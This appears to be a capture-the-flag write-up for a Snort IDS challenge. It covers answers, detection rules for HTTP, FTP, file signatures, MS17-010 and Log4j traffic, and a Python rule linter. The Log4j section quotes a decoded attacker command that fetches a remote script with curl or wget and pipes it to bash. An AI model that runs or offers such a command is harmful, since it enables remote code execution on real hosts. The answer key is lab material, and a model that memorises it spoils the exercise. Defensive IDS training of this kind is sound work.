Snort Challenge - The Basics

Put Snort skills into practice and write Snort rules to analyse live-captured network traffic.


Last updated 2 years ago

Writing IDS Rules (HTTP)

Write rules to detect "all TCP port 80 traffic" packets in the given pcap file.

Making the rule bidirectional (<>) includes packets for both inbound and outbound traffic, which is what produces the count below.

What is the number of detected packets?

328

What is the destination address of packet 63?

145.254.160.237

What is the ACK number of packet 64?

0x38AFFFF3

What is the SEQ number of packet 62?

0x38AFFFF3

What is the TTL of packet 65?

128

What is the source IP of packet 65?

145.254.160.237

What is the source port of packet 65?

3372

Writing IDS Rules (FTP)

Write rules to detect "all TCP port 21" traffic in the given pcap.

What is the number of detected packets?

614

What is the FTP service name?

Microsoft FTP Service

Write a rule to detect failed FTP login attempts in the given pcap.

What is the number of detected packets?

41

Write a rule to detect successful FTP logins in the given pcap.

What is the number of detected packets?

1

Write a rule to detect failed FTP login attempts with a valid username but a bad password or no password.

What is the number of detected packets?

42

Write a rule to detect failed FTP login attempts with "Administrator" username but a bad password or no password.

What is the number of detected packets?

7

Writing IDS Rules (PNG)

Write a rule to detect the PNG file in the given pcap.

Investigate the logs and identify the software name embedded in the packet.

Adobe Image Ready

Write a rule to detect the GIF file in the given pcap.

Investigate the logs and identify the image format embedded in the packet.

Writing IDS Rules (Torrent Metafile)

Write a rule to detect the torrent metafile in the given pcap.

What is the number of detected packets?

2

Investigate the log/alarm files.

What is the name of the torrent application?

bittorrent

What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?

application/x-bittorrent

What is the hostname of the torrent metafile?

tracker2.torrentbox.com

Troubleshooting Rule Syntax Errors

Fix the syntax errors in the given rule files.

Test each ruleset with the following command structure:

sudo snort -c local-X.rules -r mx-1.pcap -A console

Fix the syntax error in local-1.rules file and make it work smoothly.

What is the number of the detected packets?

16

After changing the command to sudo snort -c local-1.rules -dev -l . -r mx-1.pcap -A console, the Snort rule ran successfully.

Fix the syntax error in local-2.rules file and make it work smoothly.

What is the number of the detected packets?

68

Fix the syntax error in local-3.rules file and make it work smoothly.

What is the number of the detected packets?

87

Fix the syntax error in local-4.rules file and make it work smoothly.

What is the number of the detected packets?

90

Fix the syntax error in local-5.rules file and make it work smoothly.

What is the number of the detected packets?

155

Fix the logical error in local-6.rules file and make it work smoothly to create alerts.

What is the number of the detected packets?

2

Fix the logical error in local-7.rules file and make it work smoothly to create alerts.

What is the name of the required option?

msg
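As an added example (not part of the room or this write-up), a small Python linter that flags the same categories of error met in local-1 to local-7: no space between the header and the option block, a missing port, a duplicate SID, an unmatched msg quote, an illegal direction specifier, a missing msg, and a bad escape sequence in content. The sample rules are constructed to show one error each.

```python
import re
from collections import Counter

SID_RE = re.compile(r"\bsid\s*:\s*(\d+)")
CONTENT_RE = re.compile(r'content\s*:\s*"((?:[^"\\]|\\.)*)"')

def lint_rule(rule: str) -> list:
    """Return the problems found in one Snort 2 rule line (empty list when clean)."""
    problems = []
    head, _, tail = rule.partition("(")
    if not head.endswith(" "):
        problems.append("no space between header and '('")
    fields = head.split()  # action proto src_ip src_port direction dst_ip dst_port
    if len(fields) != 7:
        problems.append("port value missing" if len(fields) < 7 else "too many header fields")
    elif fields[4] not in ("->", "<>"):
        problems.append(f"illegal direction specifier '{fields[4]}'")
    options = tail.rstrip().rstrip(")")
    if options.replace('\\"', "").count('"') % 2:
        problems.append("unmatched quote in rule option")
    if not re.search(r"\bmsg\s*:", options):
        problems.append("alert does not have a msg set")
    for content in CONTENT_RE.findall(options):
        if re.search(r'\\[^;\\"|]', content):  # Snort only allows \; \\ \" and \| in content
            problems.append("bad escape sequence in content")
    return problems

def lint_ruleset(rules) -> dict:
    """Lint every rule and also flag SIDs used twice (Snort rejects duplicate GID:SID pairs)."""
    sids = Counter(m.group(1) for m in map(SID_RE.search, rules) if m)
    report = {}
    for number, rule in enumerate(rules, 1):
        problems = lint_rule(rule)
        m = SID_RE.search(rule)
        if m and sids[m.group(1)] > 1:
            problems.append(f"duplicate sid {m.group(1)}")
        if problems:
            report[number] = problems
    return report

# Constructed sample rules, one per error category seen in the local-*.rules tasks
SAMPLE_RULES = [
    'alert tcp any any <> any 80(msg: "no space"; sid: 1000001; rev: 1;)',
    'alert tcp any any <> any (msg: "port missing"; sid: 1000002; rev: 1;)',
    'alert tcp any any <> any 80 (msg: "duplicate sid"; sid: 1000002; rev: 1;)',
    'alert tcp any any <> any 80 (msg: "unmatched quote; sid: 1000003; rev: 1;)',
    'alert tcp any any <- any 80 (msg: "bad direction"; sid: 1000004; rev: 1;)',
    'alert tcp any any <> any 80 (content: "GET"; sid: 1000005; rev: 1;)',
    'alert tcp any any <> any 445 (msg: "ipc"; content: "\\IPC$"; sid: 1000006; rev: 1;)',
]
```

Run lint_ruleset(SAMPLE_RULES) to get a dict keyed by rule number; a clean rule such as the Administrator FTP rule from this page returns an empty list from lint_rule.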

Using External Rules (MS17-010)

Use the given rule file (local.rules) to investigate the MS17-010 exploitation.

What is the number of detected packets?

25154

Use the empty local-1.rules file to write a new rule to detect payloads containing the "\IPC$" keyword.

What is the number of detected packets?

12

Investigate the log/alarm files.

What is the requested path?

\\192.168.116.138\IPC

What is the CVSS v2 score of the MS17-010 vulnerability?

Using External Rules (Log4j)

Use the given rule file (local.rules) to investigate the log4j exploitation.

What is the number of detected packets?

26

Investigate the log/alarm files.

How many rules were triggered?

4

Since all of the triggered alerts carry SIDs of the form 210037xx, grepping the log for that pattern and collapsing the duplicate lines gives the answer: 4 rules were triggered.

Investigate the log/alarm files.

What are the first six digits of the triggered rule sids?

210037

Use the empty local-1.rules file to write a new rule to detect packet payloads between 770 and 855 bytes.

What is the number of detected packets?

41

Investigate the log/alarm files.

What is the name of the used encoding algorithm?

Base64

Investigate the log/alarm files.

What is the IP ID of the corresponding packet?

62808

Investigate the log/alarm files.

Decode the encoded command.

What is the attacker's command?

(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

What is the CVSS v2 score of the Log4j vulnerability?

9.3

Notes from the task screenshots

Writing IDS Rules (HTTP): the Snort log was created with the local rules (328 packets), then read back with snort -r, stopping at packets 63, 64, 62 and 65 to read off the destination address (145.254.160.237), the ACK number (0x38AFFFF3), the SEQ number (0x38AFFFF3), the TTL (128), the source IP (145.254.160.237) and the source port (3372).

Writing IDS Rules (FTP): the port 21 rule gives 614 packets; the service name was found by grepping the log for the FTP "Service Ready" return code. Failed logins: 41; successful logins: 1; valid username with a bad or no password: 42. Rule used for the Administrator question:

alert tcp any any <> any 21 (msg: "Failed Admin Login Attempt"; content:"Administrator"; content:"331 Password"; sid: 100005; rev: 1;)

Writing IDS Rules (PNG): use the PNG file signature as the content value; the software name embedded in the packet is Adobe Image Ready. For the GIF task, use the GIF file signature as the content value; the image format is GIF98a.

Writing IDS Rules (Torrent Metafile): the torrent application is bittorrent and the hostname of the torrent metafile is tracker2.torrentbox.com.

Troubleshooting Rule Syntax Errors:
  • local-1.rules: the header ran straight into the option block ("any(msg:"); corrected to "any (msg:" with sid: 1000001. 16 packets.
  • local-2.rules: port value missing. 68 packets.
  • local-3.rules: duplicate GID/SID pair. 87 packets.
  • local-4.rules: unmatched quote in the msg option. 90 packets.
  • local-5.rules: illegal direction specifier. 155 packets.
  • local-6.rules: change the direction to -> and the content to GET. 2 packets.
  • local-7.rules: the alert has no msg set.

Using External Rules (MS17-010): 25154 packets with the given rules. Writing the "\IPC$" rule produced a "Bad escape sequence" error; removing the backslash from the content fixed it. The requested path is \\192.168.116.138\IPC. CVSS v2 score reference: https://www.tenable.com/plugins/nessus/97737

Using External Rules (Log4j): 26 packets, 4 rules triggered. The log was read with sudo snort -X -r snort.log.1681926058. CVSS v2 score reference: https://nvd.nist.gov/vuln/detail/CVE-2021-44228